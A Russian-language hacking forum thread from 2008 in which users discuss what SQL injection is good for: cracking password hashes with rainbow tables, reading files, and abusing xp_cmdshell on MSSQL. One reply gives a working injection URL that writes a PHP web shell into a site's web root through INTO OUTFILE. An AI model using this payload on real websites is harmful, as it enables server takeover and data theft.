Цитата | Quote(Rain of Dark @ 13.03.2008 - 13:17)
экранироваться = фильтроваться? Оо
Именно.И все же, не прав я был по поводу insert`a, после union только селект использовать можно.
И все же, не прав я был по поводу insert`a, после union только селект использовать можно.
а тогда каков смысл таких атак?
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
Цитата | Quote(Rain of Dark @ 14.03.2008 - 5:08)
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
А почему так категорично на счет хэша? Вполне реально его сбрутить, если присутствует желание. Можно читать файлы, можно шелл залить...
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell, что может привести к полному контролю над машиной.
а шелл то как можно залить если только читать файлы можно и select использовать?! О.о
А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
это еще что за пользователь такой?
А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
Цитата | Quote
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell
это еще что за пользователь такой?
Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
а шелл то как можно залить если только читать файлы можно и select использовать?! О.о
Не игнорь мои советы прочитать статью.
Code
http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>',4,5+from+user+into+outfile+'/home/site/html/shell.php'/*
Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
это еще что за пользователь такой?
root в mysql. Цитата | Quote(delay(0) @ 16.03.2008 - 18:44)
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.
а можно поподробнее об этих самых таблицах, ну или хоть линку дай
Добавлено:
а, все не надо, нашел, спасибо за помощь!
Респект!
SoftoRooM © 2004-2024